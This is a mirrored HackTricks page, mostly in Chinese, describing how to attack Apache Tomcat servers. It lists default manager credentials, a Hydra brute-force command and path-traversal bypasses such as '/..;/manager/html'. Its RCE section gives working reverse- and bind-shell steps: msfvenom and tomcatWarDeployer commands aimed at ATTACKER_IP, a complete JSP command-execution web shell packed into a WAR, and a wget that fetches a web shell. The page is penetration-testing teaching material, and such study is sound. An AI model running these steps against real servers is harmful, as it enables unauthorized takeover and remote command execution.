maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/tomcat/README.md

237 lines
8.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Tomcat
{{#include ../../../banners/hacktricks-training.md}}
## Discovery
- 它通常运行在 **port 8080**
- **常见的 Tomcat 错误:**
<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
## Enumeration
### **版本识别**
要查找 Apache Tomcat 的版本,可以执行一个简单的命令:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
这将搜索文档索引页面中的术语“Tomcat”揭示HTML响应中标题标签中的版本。
### **管理文件位置**
确定**`/manager`**和**`/host-manager`**目录的确切位置至关重要,因为它们的名称可能会被更改。建议进行暴力搜索以定位这些页面。
### **用户名枚举**
对于版本低于6的Tomcat可以通过以下方式枚举用户名
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **默认凭据**
**`/manager/html`** 目录特别敏感,因为它允许上传和部署 WAR 文件,这可能导致代码执行。该目录受到基本 HTTP 身份验证的保护,常见凭据包括:
- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
可以使用以下方式测试这些凭据:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
另一个显著的目录是 **`/manager/status`**,它显示了 Tomcat 和操作系统版本,有助于漏洞识别。
### **暴力攻击**
要对管理目录进行暴力攻击,可以使用:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
Along with setting various parameters in Metasploit to target a specific host.
## Common Vulnerabilities
### **密码回溯泄露**
在幸运的情况下,访问 `/auth.jsp` 可能会在回溯中泄露密码。
### **双重URL编码**
`mod_jk` 中的 CVE-2007-1860 漏洞允许双重URL编码路径遍历通过特制的URL使未授权访问管理界面成为可能。
要访问Tomcat的管理网页请前往 `pathTomcat/%252E%252E/manager/html`
### /examples
Apache Tomcat 版本 4.x 到 7.x 包含易受信息泄露和跨站脚本XSS攻击的示例脚本。这些脚本列出得很全面应检查是否存在未授权访问和潜在利用。找到 [更多信息在这里](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp
### **路径遍历漏洞**
在某些 [**易受攻击的Tomcat配置**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) 中,您可以使用路径 `/..;/` 访问Tomcat中的受保护目录。
因此,例如,您可能能够通过访问 `www.vulnerable.com/lalala/..;/manager/html` **访问Tomcat管理**页面。
**另一种方法**是通过访问 `http://www.vulnerable.com/;param=value/manager/html` 来绕过受保护的路径。
## RCE
最后如果您可以访问Tomcat Web应用程序管理器您可以 **上传并部署一个.war文件执行代码**
### 限制
您只能在拥有 **足够权限**(角色:**admin**、**manager** 和 **manager-script**的情况下部署WAR。这些详细信息通常可以在 _tomcat-users.xml_ 中找到,通常定义在 `/usr/share/tomcat9/etc/tomcat-users.xml`(在不同版本之间有所不同)(见 [POST ](./#post)section
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom 反向 Shell
1. 创建要部署的 war
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```
2. 上传 `revshell.war` 文件并访问它 (`/revshell/`):
### 使用 [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) 进行绑定和反向 shell
在某些情况下,这可能不起作用(例如旧版本的 sun
#### 下载
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### 反向 shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### 绑定 shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### 使用 [Culsterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### 手动方法 - Web shell
创建 **index.jsp**,并使用此 [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp)
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
```
```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
您还可以安装此程序(允许上传、下载和命令执行):[http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
### 手动方法 2
获取一个 JSP web shell例如 [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp),并创建一个 WAR 文件:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST
Tomcat 凭据文件的名称是 `tomcat-users.xml`,该文件指示用户在 tomcat 中的角色。
```bash
find / -name tomcat-users.xml 2>/dev/null
```
示例:
```xml
[...]
<!--
By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
Built-in Tomcat manager roles:
- manager-gui - allows access to the HTML GUI and the status pages
- manager-script - allows access to the HTTP API and the status pages
- manager-jmx - allows access to the JMX proxy and the status pages
- manager-status - allows access to the status pages only
-->
[...]
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
```
## 其他 Tomcat 扫描工具
- [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
## 参考文献
- [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
- [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink